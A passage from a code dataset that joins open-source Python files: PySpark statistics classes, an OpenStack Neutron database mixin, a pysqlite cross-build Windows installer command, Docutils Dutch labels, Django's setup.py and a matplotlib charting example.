return Summarizer._get_single_metric(col, weightCol, "std")
@staticmethod
@since("2.4.0")
def count(col, weightCol=None):
"""
return a column of count summary
"""
return Summarizer._get_single_metric(col, weightCol, "count")
@staticmethod
@since("2.4.0")
def numNonZeros(col, weightCol=None):
"""
return a column of numNonZero summary
"""
return Summarizer._get_single_metric(col, weightCol, "numNonZeros")
@staticmethod
@since("2.4.0")
def max(col, weightCol=None):
"""
return a column of max summary
"""
return Summarizer._get_single_metric(col, weightCol, "max")
@staticmethod
@since("2.4.0")
def min(col, weightCol=None):
"""
return a column of min summary
"""
return Summarizer._get_single_metric(col, weightCol, "min")
@staticmethod
@since("2.4.0")
def normL1(col, weightCol=None):
"""
return a column of normL1 summary
"""
return Summarizer._get_single_metric(col, weightCol, "normL1")
@staticmethod
@since("2.4.0")
def normL2(col, weightCol=None):
"""
return a column of normL2 summary
"""
return Summarizer._get_single_metric(col, weightCol, "normL2")
@staticmethod
def _check_param(featuresCol, weightCol):
if weightCol is None:
weightCol = lit(1.0)
if not isinstance(featuresCol, Column) or not isinstance(weightCol, Column):
raise TypeError("featureCol and weightCol should be a Column")
return featuresCol, weightCol
@staticmethod
def _get_single_metric(col, weightCol, metric):
col, weightCol = Summarizer._check_param(col, weightCol)
return Column(JavaWrapper._new_java_obj("org.apache.spark.ml.stat.Summarizer." + metric,
col._jc, weightCol._jc))
@staticmethod
@since("2.4.0")
def metrics(*metrics):
"""
Given a list of metrics, provides a builder that it turns computes metrics from a column.
See the documentation of [[Summarizer]] for an example.
The following metrics are accepted (case sensitive):
- mean: a vector that contains the coefficient-wise mean.
- sum: a vector that contains the coefficient-wise sum.
- variance: a vector tha contains the coefficient-wise variance.
- std: a vector tha contains the coefficient-wise standard deviation.
- count: the count of all vectors seen.
- numNonzeros: a vector with the number of non-zeros for each coefficients
- max: the maximum for each coefficient.
- min: the minimum for each coefficient.
- normL2: the Euclidean norm for each coefficient.
- normL1: the L1 norm of each coefficient (sum of the absolute values).
:param metrics:
metrics that can be provided.
:return:
an object of :py:class:`pyspark.ml.stat.SummaryBuilder`
Note: Currently, the performance of this interface is about 2x~3x slower then using the RDD
interface.
"""
sc = SparkContext._active_spark_context
js = JavaWrapper._new_java_obj("org.apache.spark.ml.stat.Summarizer.metrics",
_to_seq(sc, metrics))
return SummaryBuilder(js)
class SummaryBuilder(JavaWrapper):
"""
A builder object that provides summary statistics about a given column.
Users should not directly create such builders, but instead use one of the methods in
:py:class:`pyspark.ml.stat.Summarizer`
.. versionadded:: 2.4.0
"""
def __init__(self, jSummaryBuilder):
super(SummaryBuilder, self).__init__(jSummaryBuilder)
@since("2.4.0")
def summary(self, featuresCol, weightCol=None):
"""
Returns an aggregate object that contains the summary of the column with the requested
metrics.
:param featuresCol:
a column that contains features Vector object.
:param weightCol:
a column that contains weight value. Default weight is 1.0.
:return:
an aggregate column that contains the statistics. The exact content of this
structure is determined during the creation of the builder.
"""
featuresCol, weightCol = Summarizer._check_param(featuresCol, weightCol)
return Column(self._java_obj.summary(featuresCol._jc, weightCol._jc))
class MultivariateGaussian(object):
"""Represents a (mean, cov) tuple
>>> m = MultivariateGaussian(Vectors.dense([11,12]), DenseMatrix(2, 2, (1.0, 3.0, 5.0, 2.0)))
>>> (m.mean, m.cov.toArray())
(DenseVector([11.0, 12.0]), array([[ 1., 5.],
[ 3., 2.]]))
.. versionadded:: 3.0.0
"""
def __init__(self, mean, cov):
self.mean = mean
self.cov = cov
class ANOVATest(object):
"""
Conduct ANOVA Classification Test for continuous features against categorical labels.
.. versionadded:: 3.1.0
"""
@staticmethod
@since("3.1.0")
def test(dataset, featuresCol, labelCol, flatten=False):
"""
Perform an ANOVA test using dataset.
:param dataset:
DataFrame of categorical labels and continuous features.
:param featuresCol:
Name of features column in dataset, of type `Vector` (`VectorUDT`).
:param labelCol:
Name of label column in dataset, of any numerical type.
:param flatten: if True, flattens the returned dataframe.
:return:
DataFrame containing the test result for every feature against the label.
If flatten is True, this DataFrame will contain one row per feature with the following
fields:
- `featureIndex: int`
- `pValue: float`
- `degreesOfFreedom: int`
- `fValue: float`
If flatten is False, this DataFrame will contain a single Row with the following fields:
- `pValues: Vector`
- `degreesOfFreedom: Array[int]`
- `fValues: Vector`
Each of these fields has one value per feature.
>>> from pyspark.ml.linalg import Vectors
>>> from pyspark.ml.stat import ANOVATest
>>> dataset = [[2.0, Vectors.dense([0.43486404, 0.57153633, 0.43175686,
... 0.51418671, 0.61632374, 0.96565515])],
... [1.0, Vectors.dense([0.49162732, 0.6785187, 0.85460572,
... 0.59784822, 0.12394819, 0.53783355])],
... [2.0, Vectors.dense([0.30879653, 0.54904515, 0.17103889,
... 0.40492506, 0.18957493, 0.5440016])],
... [3.0, Vectors.dense([0.68114391, 0.60549825, 0.69094651,
... 0.62102109, 0.05471483, 0.96449167])]]
>>> dataset = spark.createDataFrame(dataset, ["label", "features"])
>>> anovaResult = ANOVATest.test(dataset, 'features', 'label')
>>> row = anovaResult.select("fValues", "pValues").collect()
>>> row[0].fValues
DenseVector([4.0264, 18.4713, 3.4659, 1.9042, 0.5532, 0.512])
>>> row[0].pValues
DenseVector([0.3324, 0.1623, 0.3551, 0.456, 0.689, 0.7029])
>>> anovaResult = ANOVATest.test(dataset, 'features', 'label', True)
>>> row = anovaResult.orderBy("featureIndex").collect()
>>> row[0].fValue
4.026438671875297
"""
sc = SparkContext._active_spark_context
javaTestObj = _jvm().org.apache.spark.ml.stat.ANOVATest
args = [_py2java(sc, arg) for arg in (dataset, featuresCol, labelCol, flatten)]
return _java2py(sc, javaTestObj.test(*args))
class FValueTest(object):
"""
Conduct F Regression test for continuous features against continuous labels.
.. versionadded:: 3.1.0
"""
@staticmethod
@since("3.1.0")
def test(dataset, featuresCol, labelCol, flatten=False):
"""
Perform a F Regression test using dataset.
:param dataset:
DataFrame of continuous labels and continuous features.
:param featuresCol:
Name of features column in dataset, of type `Vector` (`VectorUDT`).
:param labelCol:
Name of label column in dataset, of any numerical type.
:param flatten: if True, flattens the returned dataframe.
:return:
DataFrame containing the test result for every feature against the label.
If flatten is True, this DataFrame will contain one row per feature with the following
fields:
- `featureIndex: int`
- `pValue: float`
- `degreesOfFreedom: int`
- `fValue: float`
If flatten is False, this DataFrame will contain a single Row with the following fields:
- `pValues: Vector`
- `degreesOfFreedom: Array[int]`
- `fValues: Vector`
Each of these fields has one value per feature.
>>> from pyspark.ml.linalg import Vectors
>>> from pyspark.ml.stat import FValueTest
>>> dataset = [[0.57495218, Vectors.dense([0.43486404, 0.57153633, 0.43175686,
... 0.51418671, 0.61632374, 0.96565515])],
... [0.84619853, Vectors.dense([0.49162732, 0.6785187, 0.85460572,
... 0.59784822, 0.12394819, 0.53783355])],
... [0.39777647, Vectors.dense([0.30879653, 0.54904515, 0.17103889,
... 0.40492506, 0.18957493, 0.5440016])],
... [0.79201573, Vectors.dense([0.68114391, 0.60549825, 0.69094651,
... 0.62102109, 0.05471483, 0.96449167])]]
>>> dataset = spark.createDataFrame(dataset, ["label", "features"])
>>> fValueResult = FValueTest.test(dataset, 'features', 'label')
>>> row = fValueResult.select("fValues", "pValues").collect()
>>> row[0].fValues
DenseVector([3.741, 7.5807, 142.0684, 34.9849, 0.4112, 0.0539])
>>> row[0].pValues
DenseVector([0.1928, 0.1105, 0.007, 0.0274, 0.5871, 0.838])
>>> fValueResult = FValueTest.test(dataset, 'features', 'label', True)
>>> row = fValueResult.orderBy("featureIndex").collect()
>>> row[0].fValue
3.7409548308350593
"""
sc = SparkContext._active_spark_context
javaTestObj = _jvm().org.apache.spark.ml.stat.FValueTest
args = [_py2java(sc, arg) for arg in (dataset, featuresCol, labelCol, flatten)]
return _java2py(sc, javaTestObj.test(*args))
if __name__ == "__main__":
import doctest
import numpy
import pyspark.ml.stat
from pyspark.sql import SparkSession
try:
# Numpy 1.14+ changed it's string format.
numpy.set_printoptions(legacy='1.13')
except TypeError:
pass
globs = pyspark.ml.stat.__dict__.copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
spark = SparkSession.builder \
.master("local[2]") \
.appName("ml.stat tests") \
.getOrCreate()
sc = spark.sparkContext
globs['sc'] = sc
globs['spark'] = spark
failure_count, test_count = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
spark.stop()
if failure_count:
sys.exit(-1)
| apache-2.0 |
sasukeh/neutron | neutron/db/common_db_mixin.py | 9 | 13383 | # Copyright (c) 2014 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import weakref
import six
from sqlalchemy import and_
from sqlalchemy import or_
from sqlalchemy import sql
from neutron.common import exceptions as n_exc
from neutron.db import sqlalchemyutils
def model_query_scope(context, model):
# Unless a context has 'admin' or 'advanced-service' rights the
# query will be scoped to a single tenant_id
return ((not context.is_admin and hasattr(model, 'tenant_id')) and
(not context.is_advsvc and hasattr(model, 'tenant_id')))
def model_query(context, model):
query = context.session.query(model)
# define basic filter condition for model query
query_filter = None
if model_query_scope(context, model):
query_filter = (model.tenant_id == context.tenant_id)
if query_filter is not None:
query = query.filter(query_filter)
return query
class CommonDbMixin(object):
"""Common methods used in core and service plugins."""
# Plugins, mixin classes implementing extension will register
# hooks into the dict below for "augmenting" the "core way" of
# building a query for retrieving objects from a model class.
# To this aim, the register_model_query_hook and unregister_query_hook
# from this class should be invoked
_model_query_hooks = {}
# This dictionary will store methods for extending attributes of
# api resources. Mixins can use this dict for adding their own methods
# TODO(salvatore-orlando): Avoid using class-level variables
_dict_extend_functions = {}
@classmethod
def register_model_query_hook(cls, model, name, query_hook, filter_hook,
result_filters=None):
"""Register a hook to be invoked when a query is executed.
Add the hooks to the _model_query_hooks dict. Models are the keys
of this dict, whereas the value is another dict mapping hook names to
callables performing the hook.
Each hook has a "query" component, used to build the query expression
and a "filter" component, which is used to build the filter expression.
Query hooks take as input the query being built and return a
transformed query expression.
Filter hooks take as input the filter expression being built and return
a transformed filter expression
"""
cls._model_query_hooks.setdefault(model, {})[name] = {
'query': query_hook, 'filter': filter_hook,
'result_filters': result_filters}
@classmethod
def register_dict_extend_funcs(cls, resource, funcs):
cls._dict_extend_functions.setdefault(resource, []).extend(funcs)
@property
def safe_reference(self):
"""Return a weakref to the instance.
Minimize the potential for the instance persisting
unnecessarily in memory by returning a weakref proxy that
won't prevent deallocation.
"""
return weakref.proxy(self)
def model_query_scope(self, context, model):
return model_query_scope(context, model)
def _model_query(self, context, model):
if isinstance(model, UnionModel):
return self._union_model_query(context, model)
else:
return self._single_model_query(context, model)
def _union_model_query(self, context, model):
# A union query is a query that combines multiple sets of data
# together and represents them as one. So if a UnionModel was
# passed in, we generate the query for each model with the
# appropriate filters and then combine them together with the
# .union operator. This allows any subsequent users of the query
# to handle it like a normal query (e.g. add pagination/sorting/etc)
first_query = None
remaining_queries = []
for name, component_model in model.model_map.items():
query = self._single_model_query(context, component_model)
if model.column_type_name:
query.add_columns(
sql.expression.column('"%s"' % name, is_literal=True).
label(model.column_type_name)
)
if first_query is None:
first_query = query
else:
remaining_queries.append(query)
return first_query.union(*remaining_queries)
def _single_model_query(self, context, model):
query = context.session.query(model)
# define basic filter condition for model query
query_filter = None
if self.model_query_scope(context, model):
if hasattr(model, 'rbac_entries'):
rbac_model, join_params = self._get_rbac_query_params(model)
query = query.outerjoin(*join_params)
query_filter = (
(model.tenant_id == context.tenant_id) |
((rbac_model.action == 'access_as_shared') &
((rbac_model.target_tenant == context.tenant_id) |
(rbac_model.target_tenant == '*'))))
elif hasattr(model, 'shared'):
query_filter = ((model.tenant_id == context.tenant_id) |
(model.shared == sql.true()))
else:
query_filter = (model.tenant_id == context.tenant_id)
# Execute query hooks registered from mixins and plugins
for _name, hooks in six.iteritems(self._model_query_hooks.get(model,
{})):
query_hook = hooks.get('query')
if isinstance(query_hook, six.string_types):
query_hook = getattr(self, query_hook, None)
if query_hook:
query = query_hook(context, model, query)
filter_hook = hooks.get('filter')
if isinstance(filter_hook, six.string_types):
filter_hook = getattr(self, filter_hook, None)
if filter_hook:
query_filter = filter_hook(context, model, query_filter)
# NOTE(salvatore-orlando): 'if query_filter' will try to evaluate the
# condition, raising an exception
if query_filter is not None:
query = query.filter(query_filter)
return query
def _fields(self, resource, fields):
if fields:
return dict(((key, item) for key, item in resource.items()
if key in fields))
return resource
def _get_tenant_id_for_create(self, context, resource):
if context.is_admin and 'tenant_id' in resource:
tenant_id = resource['tenant_id']
elif ('tenant_id' in resource and
resource['tenant_id'] != context.tenant_id):
reason = _('Cannot create resource for another tenant')
raise n_exc.AdminRequired(reason=reason)
else:
tenant_id = context.tenant_id
return tenant_id
def _get_by_id(self, context, model, id):
query = self._model_query(context, model)
return query.filter(model.id == id).one()
@staticmethod
def _get_rbac_query_params(model):
"""Return the class and join params for the rbac relationship."""
try:
cls = model.rbac_entries.property.mapper.class_
return (cls, (cls, ))
except AttributeError:
# an association proxy is being used (e.g. subnets
# depends on network's rbac entries)
rbac_model = (model.rbac_entries.target_class.
rbac_entries.property.mapper.class_)
return (rbac_model, model.rbac_entries.attr)
def _apply_filters_to_query(self, query, model, filters, context=None):
if filters:
for key, value in six.iteritems(filters):
column = getattr(model, key, None)
# NOTE(kevinbenton): if column is a hybrid property that
# references another expression, attempting to convert to
# a boolean will fail so we must compare to None.
# See "An Important Expression Language Gotcha" in:
# docs.sqlalchemy.org/en/rel_0_9/changelog/migration_06.html
if column is not None:
if not value:
query = query.filter(sql.false())
return query
query = query.filter(column.in_(value))
elif key == 'shared' and hasattr(model, 'rbac_entries'):
# translate a filter on shared into a query against the
# object's rbac entries
rbac, join_params = self._get_rbac_query_params(model)
query = query.outerjoin(*join_params, aliased=True)
matches = [rbac.target_tenant == '*']
if context:
matches.append(rbac.target_tenant == context.tenant_id)
is_shared = and_(
~rbac.object_id.is_(None),
rbac.action == 'access_as_shared',
or_(*matches)
)
query = query.filter(is_shared if value[0] else ~is_shared)
for _nam, hooks in six.iteritems(self._model_query_hooks.get(model,
{})):
result_filter = hooks.get('result_filters', None)
if isinstance(result_filter, six.string_types):
result_filter = getattr(self, result_filter, None)
if result_filter:
query = result_filter(query, filters)
return query
def _apply_dict_extend_functions(self, resource_type,
response, db_object):
for func in self._dict_extend_functions.get(
resource_type, []):
args = (response, db_object)
if isinstance(func, six.string_types):
func = getattr(self, func, None)
else:
# must call unbound method - use self as 1st argument
args = (self,) + args
if func:
func(*args)
def _get_collection_query(self, context, model, filters=None,
sorts=None, limit=None, marker_obj=None,
page_reverse=False):
collection = self._model_query(context, model)
collection = self._apply_filters_to_query(collection, model, filters,
context)
if limit and page_reverse and sorts:
sorts = [(s[0], not s[1]) for s in sorts]
collection = sqlalchemyutils.paginate_query(collection, model, limit,
sorts,
marker_obj=marker_obj)
return collection
def _get_collection(self, context, model, dict_func, filters=None,
fields=None, sorts=None, limit=None, marker_obj=None,
page_reverse=False):
query = self._get_collection_query(context, model, filters=filters,
sorts=sorts,
limit=limit,
marker_obj=marker_obj,
page_reverse=page_reverse)
items = [dict_func(c, fields) for c in query]
if limit and page_reverse:
items.reverse()
return items
def _get_collection_count(self, context, model, filters=None):
return self._get_collection_query(context, model, filters).count()
def _get_marker_obj(self, context, resource, limit, marker):
if limit and marker:
return getattr(self, '_get_%s' % resource)(context, marker)
return None
def _filter_non_model_columns(self, data, model):
"""Remove all the attributes from data which are not columns of
the model passed as second parameter.
"""
columns = [c.name for c in model.__table__.columns]
return dict((k, v) for (k, v) in
six.iteritems(data) if k in columns)
class UnionModel(object):
"""Collection of models that _model_query can query as a single table."""
def __init__(self, model_map, column_type_name=None):
# model_map is a dictionary of models keyed by an arbitrary name.
# If column_type_name is specified, the resulting records will have a
# column with that name which identifies the source of each record
self.model_map = model_map
self.column_type_name = column_type_name
| apache-2.0 |
hydroshare/hydroshare2 | hs_docker_base/pysqlite-2.6.3/cross_bdist_wininst.py | 9 | 13886 | # Gerhard Haering <gh@gharing.d> is responsible for the hacked version of this
# module.
#
# This is a modified version of the bdist_wininst distutils command to make it
# possible to build installers *with extension modules* on Unix.
"""distutils.command.bdist_wininst
Implements the Distutils 'bdist_wininst' command: create a windows installer
exe-program."""
# This module should be kept compatible with Python 2.1.
__revision__ = "$Id: bdist_wininst.py 59620 2007-12-31 14:47:07Z christian.heimes $"
import sys, os, string
from distutils.core import Command
from distutils.util import get_platform
from distutils.dir_util import create_tree, remove_tree
from distutils.errors import *
from distutils.sysconfig import get_python_version
from distutils import log
class bdist_wininst (Command):
description = "create an executable installer for MS Windows"
user_options = [('bdist-dir=', None,
"temporary directory for creating the distribution"),
('keep-temp', 'k',
"keep the pseudo-installation tree around after " +
"creating the distribution archive"),
('target-version=', None,
"require a specific python version" +
" on the target system"),
('no-target-compile', 'c',
"do not compile .py to .pyc on the target system"),
('no-target-optimize', 'o',
"do not compile .py to .pyo (optimized)"
"on the target system"),
('dist-dir=', 'd',
"directory to put final built distributions in"),
('bitmap=', 'b',
"bitmap to use for the installer instead of python-powered logo"),
('title=', 't',
"title to display on the installer background instead of default"),
('skip-build', None,
"skip rebuilding everything (for testing/debugging)"),
('install-script=', None,
"basename of installation script to be run after"
"installation or before deinstallation"),
('pre-install-script=', None,
"Fully qualified filename of a script to be run before "
"any files are installed. This script need not be in the "
"distribution"),
]
boolean_options = ['keep-temp', 'no-target-compile', 'no-target-optimize',
'skip-build']
def initialize_options (self):
self.bdist_dir = None
self.keep_temp = 0
self.no_target_compile = 0
self.no_target_optimize = 0
self.target_version = None
self.dist_dir = None
self.bitmap = None
self.title = None
self.skip_build = 0
self.install_script = None
self.pre_install_script = None
# initialize_options()
def finalize_options (self):
if self.bdist_dir is None:
bdist_base = self.get_finalized_command('bdist').bdist_base
self.bdist_dir = os.path.join(bdist_base, 'wininst')
if not self.target_version:
self.target_version = ""
if not self.skip_build and self.distribution.has_ext_modules():
short_version = get_python_version()
if self.target_version and self.target_version != short_version:
raise DistutilsOptionError, \
"target version can only be %s, or the '--skip_build'" \
" option must be specified" % (short_version,)
self.target_version = short_version
self.set_undefined_options('bdist', ('dist_dir', 'dist_dir'))
if self.install_script:
for script in self.distribution.scripts:
if self.install_script == os.path.basename(script):
break
else:
raise DistutilsOptionError, \
"install_script '%s' not found in scripts" % \
self.install_script
# finalize_options()
def run (self):
# HACK I disabled this check.
if 0 and (sys.platform != "win32" and
(self.distribution.has_ext_modules() or
self.distribution.has_c_libraries())):
raise DistutilsPlatformError \
("distribution contains extensions and/or C libraries; "
"must be compiled on a Windows 32 platform")
if not self.skip_build:
self.run_command('build')
install = self.reinitialize_command('install', reinit_subcommands=1)
install.root = self.bdist_dir
install.skip_build = self.skip_build
install.warn_dir = 0
install_lib = self.reinitialize_command('install_lib')
# we do not want to include pyc or pyo files
install_lib.compile = 0
install_lib.optimize = 0
if self.distribution.has_ext_modules():
# If we are building an installer for a Python version other
# than the one we are currently running, then we need to ensure
# our build_lib reflects the other Python version rather than ours.
# Note that for target_version!=sys.version, we must have skipped the
# build step, so there is no issue with enforcing the build of this
# version.
target_version = self.target_version
if not target_version:
assert self.skip_build, "Should have already checked this"
target_version = sys.version[0:3]
plat_specifier = ".%s-%s" % (get_platform(), target_version)
build = self.get_finalized_command('build')
build.build_lib = os.path.join(build.build_base,
'lib' + plat_specifier)
# Use a custom scheme for the zip-file, because we have to decide
# at installation time which scheme to use.
for key in ('purelib', 'platlib', 'headers', 'scripts', 'data'):
value = string.upper(key)
if key == 'headers':
value = value + '/Include/$dist_name'
setattr(install,
'install_' + key,
value)
log.info("installing to %s", self.bdist_dir)
install.ensure_finalized()
# avoid warning of 'install_lib' about installing
# into a directory not in sys.path
sys.path.insert(0, os.path.join(self.bdist_dir, 'PURELIB'))
install.run()
del sys.path[0]
# And make an archive relative to the root of the
# pseudo-installation tree.
from tempfile import mktemp
archive_basename = mktemp()
fullname = self.distribution.get_fullname()
arcname = self.make_archive(archive_basename, "zip",
root_dir=self.bdist_dir)
# create an exe containing the zip-file
self.create_exe(arcname, fullname, self.bitmap)
if self.distribution.has_ext_modules():
pyversion = get_python_version()
else:
pyversion = 'any'
self.distribution.dist_files.append(('bdist_wininst', pyversion,
self.get_installer_filename(fullname)))
# remove the zip-file again
log.debug("removing temporary file '%s'", arcname)
os.remove(arcname)
if not self.keep_temp:
remove_tree(self.bdist_dir, dry_run=self.dry_run)
# run()
def get_inidata (self):
# Return data describing the installation.
lines = []
metadata = self.distribution.metadata
# Write the [metadata] section.
lines.append("[metadata]")
# 'info' will be displayed in the installer's dialog box,
# describing the items to be installed.
info = (metadata.long_description or '') + '\n'
# Escape newline characters
def escape(s):
return string.replace(s, "\n", "\\n")
for name in ["author", "author_email", "description", "maintainer",
"maintainer_email", "name", "url", "version"]:
data = getattr(metadata, name, "")
if data:
info = info + ("\n %s: %s" % \
(string.capitalize(name), escape(data)))
lines.append("%s=%s" % (name, escape(data)))
# The [setup] section contains entries controlling
# the installer runtime.
lines.append("\n[Setup]")
if self.install_script:
lines.append("install_script=%s" % self.install_script)
lines.append("info=%s" % escape(info))
lines.append("target_compile=%d" % (not self.no_target_compile))
lines.append("target_optimize=%d" % (not self.no_target_optimize))
if self.target_version:
lines.append("target_version=%s" % self.target_version)
title = self.title or self.distribution.get_fullname()
lines.append("title=%s" % escape(title))
import time
import distutils
build_info = "Built %s with distutils-%s" % \
(time.ctime(time.time()), distutils.__version__)
lines.append("build_info=%s" % build_info)
return string.join(lines, "\n")
# get_inidata()
def create_exe (self, arcname, fullname, bitmap=None):
import struct
self.mkpath(self.dist_dir)
cfgdata = self.get_inidata()
installer_name = self.get_installer_filename(fullname)
self.announce("creating %s" % installer_name)
if bitmap:
bitmapdata = open(bitmap, "rb").read()
bitmaplen = len(bitmapdata)
else:
bitmaplen = 0
file = open(installer_name, "wb")
file.write(self.get_exe_bytes())
if bitmap:
file.write(bitmapdata)
# Convert cfgdata from unicode to ascii, mbcs encoded
try:
unicode
except NameError:
pass
else:
if isinstance(cfgdata, unicode):
cfgdata = cfgdata.encode("mbcs")
# Append the pre-install script
cfgdata = cfgdata + "\0"
if self.pre_install_script:
script_data = open(self.pre_install_script, "r").read()
cfgdata = cfgdata + script_data + "\n\0"
else:
# empty pre-install script
cfgdata = cfgdata + "\0"
file.write(cfgdata)
# The 'magic number' 0x1234567B is used to make sure that the
# binary layout of 'cfgdata' is what the wininst.exe binary
# expects. If the layout changes, increment that number, make
# the corresponding changes to the wininst.exe sources, and
# recompile them.
header = struct.pack("<iii",
0x1234567B, # tag
len(cfgdata), # length
bitmaplen, # number of bytes in bitmap
)
file.write(header)
file.write(open(arcname, "rb").read())
# create_exe()
def get_installer_filename(self, fullname):
# Factored out to allow overriding in subclasses
if self.target_version:
# if we create an installer for a specific python version,
# it's better to include this in the name
installer_name = os.path.join(self.dist_dir,
"%s.win32-py%s.exe" %
(fullname, self.target_version))
else:
installer_name = os.path.join(self.dist_dir,
"%s.win32.exe" % fullname)
return installer_name
# get_installer_filename()
def get_exe_bytes (self):
from distutils.msvccompiler import get_build_version
# If a target-version other than the current version has been
# specified, then using the MSVC version from *this* build is no good.
# Without actually finding and executing the target version and parsing
# its sys.version, we just hard-code our knowledge of old versions.
# NOTE: Possible alternative is to allow "--target-version" to
# specify a Python executable rather than a simple version string.
# We can then execute this program to obtain any info we need, such
# as the real sys.version string for the build.
cur_version = get_python_version()
if self.target_version and self.target_version != cur_version:
if self.target_version < "2.3":
raise NotImplementedError
elif self.target_version == "2.3":
bv = "6"
elif self.target_version in ("2.4", "2.5"):
bv = "7.1"
elif self.target_version in ("2.6", "2.7"):
bv = "9.0"
else:
raise NotImplementedError
else:
# for current version - use authoritative check.
bv = get_build_version()
# wininst-x.y.exe is in the same directory as this file
directory = os.path.dirname(__file__)
# we must use a wininst-x.y.exe built with the same C compiler
# used for python. XXX What about mingw, borland, and so on?
# The uninstallers need to be available in $PYEXT_CROSS/uninst/*.exe
# Use http://oss.itsystementwicklung.de/hg/pyext_cross_linux_to_win32/
# and copy it alongside your pysqlite checkout.
filename = os.path.join(directory, os.path.join(os.environ["PYEXT_CROSS"], "uninst", "wininst-%s.exe" % bv))
return open(filename, "rb").read()
# class bdist_wininst
| bsd-3-clause |
crakensio/django_training | lib/python2.7/site-packages/docutils/languages/nl.py | 200 | 1865 | # $Id: nl.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: Martijn Pieters <mjpieters@users.sourceforge.net>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Dutch-language mappings for language-dependent features of Docutils.
"""
__docformat__ = 'reStructuredText'
labels = {
# fixed: language-dependent
'author': 'Auteur',
'authors': 'Auteurs',
'organization': 'Organisatie',
'address': 'Adres',
'contact': 'Contact',
'version': 'Versie',
'revision': 'Revisie',
'status': 'Status',
'date': 'Datum',
'copyright': 'Copyright',
'dedication': 'Toewijding',
'abstract': 'Samenvatting',
'attention': 'Attentie!',
'caution': 'Let op!',
'danger': '!GEVAAR!',
'error': 'Fout',
'hint': 'Hint',
'important': 'Belangrijk',
'note': 'Opmerking',
'tip': 'Tip',
'warning': 'Waarschuwing',
'contents': 'Inhoud'}
"""Mapping of node class name to label text."""
bibliographic_fields = {
# language-dependent: fixed
'auteur': 'author',
'auteurs': 'authors',
'organisatie': 'organization',
'adres': 'address',
'contact': 'contact',
'versie': 'version',
'revisie': 'revision',
'status': 'status',
'datum': 'date',
'copyright': 'copyright',
'toewijding': 'dedication',
'samenvatting': 'abstract'}
"""Dutch (lowcased) to canonical name mapping for bibliographic fields."""
author_separators = [';', ',']
"""List of separator strings for the 'Authors' bibliographic field. Tried in
order."""
| cc0-1.0 |
1st/django | setup.py | 123 | 3257 | import os
import sys
from distutils.sysconfig import get_python_lib
from setuptools import find_packages, setup
# Warn if we are installing over top of an existing installation. This can
# cause issues where files that were deleted from a more recent Django are
# still present in site-packages. See #18115.
overlay_warning = False
if "install" in sys.argv:
lib_paths = [get_python_lib()]
if lib_paths[0].startswith("/usr/lib/"):
# We have to try also with an explicit prefix of /usr/local in order to
# catch Debian's custom user site-packages directory.
lib_paths.append(get_python_lib(prefix="/usr/local"))
for lib_path in lib_paths:
existing_path = os.path.abspath(os.path.join(lib_path, "django"))
if os.path.exists(existing_path):
# We note the need for the warning here, but present it after the
# command is run, so it's more likely to be seen.
overlay_warning = True
break
EXCLUDE_FROM_PACKAGES = ['django.conf.project_template',
'django.conf.app_template',
'django.bin']
# Dynamically calculate the version based on django.VERSION.
version = __import__('django').get_version()
setup(
name='Django',
version=version,
url='http://www.djangoproject.com/',
author='Django Software Foundation',
author_email='foundation@djangoproject.com',
description=('A high-level Python Web framework that encourages '
'rapid development and clean, pragmatic design.'),
license='BSD',
packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES),
include_package_data=True,
scripts=['django/bin/django-admin.py'],
entry_points={'console_scripts': [
'django-admin = django.core.management:execute_from_command_line',
]},
extras_require={
"bcrypt": ["bcrypt"],
},
zip_safe=False,
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
if overlay_warning:
sys.stderr.write("""
========
WARNING!
========
You have just installed Django over top of an existing
installation, without removing it first. Because of this,
your install may now include extraneous files from a
previous version that have since been removed from
Django. This is known to cause a variety of problems. You
should manually remove the
%(existing_path)s
directory and re-install Django.
""" % {"existing_path": existing_path})
| bsd-3-clause |
marioem/data-science-from-scratch | code/visualizing_data.py | 58 | 5116 | import matplotlib.pyplot as plt
from collections import Counter
def make_chart_simple_line_chart(plt):
years = [1950, 1960, 1970, 1980, 1990, 2000, 2010]
gdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3]
# create a line chart, years on x-axis, gdp on y-axis
plt.plot(years, gdp, color='green', marker='o', linestyle='solid')
# add a title
plt.title("Nominal GDP")
# add a label to the y-axis
plt.ylabel("Billions of $")
plt.show()
def make_chart_simple_bar_chart(plt):
movies = ["Annie Hall", "Ben-Hur", "Casablanca", "Gandhi", "West Side Story"]
num_oscars = [5, 11, 3, 8, 10]
# bars are by default width 0.8, so we'll add 0.1 to the left coordinates
# so that each bar is centered
xs = [i + 0.1 for i, _ in enumerate(movies)]
# plot bars with left x-coordinates [xs], heights [num_oscars]
plt.bar(xs, num_oscars)
plt.ylabel("# of Academy Awards")
plt.title("My Favorite Movies")
# label x-axis with movie names at bar centers
plt.xticks([i + 0.5 for i, _ in enumerate(movies)], movies)
plt.show()
def make_chart_histogram(plt):
grades = [83,95,91,87,70,0,85,82,100,67,73,77,0]
decile = lambda grade: grade // 10 * 10
histogram = Counter(decile(grade) for grade in grades)
plt.bar([x - 4 for x in histogram.keys()], # shift each bar to the left by 4
histogram.values(), # give each bar its correct height
8) # give each bar a width of 8
